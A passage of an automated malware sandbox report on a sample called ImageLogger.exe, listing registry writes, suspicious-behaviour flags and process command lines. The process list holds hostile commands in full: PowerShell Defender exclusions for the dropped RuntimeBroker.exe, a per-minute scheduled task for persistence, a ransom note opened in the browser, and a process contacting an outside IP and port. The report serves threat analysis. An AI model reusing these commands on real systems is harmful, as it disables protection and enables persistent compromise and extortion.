| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616209" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\explorer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe
"C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ImageLogger.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RuntimeBroker" /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x40,0x134,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2960 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4408 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4588 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5116 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff638c5ae48,0x7ff638c5ae58,0x7ff638c5ae68
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4692 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4416 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3372 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4744 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3512 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5416 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3cc 0x2ec
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5776 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe
"C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe"
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Local\Temp\wszaxi.exe
"C:\Users\Admin\AppData\Local\Temp\wszaxi.exe"
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\jlkern.mp3"
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 193.161.193.99 39917 <123456789> FADB3748ACBB914CAD69
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1696 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1968 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=2080 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
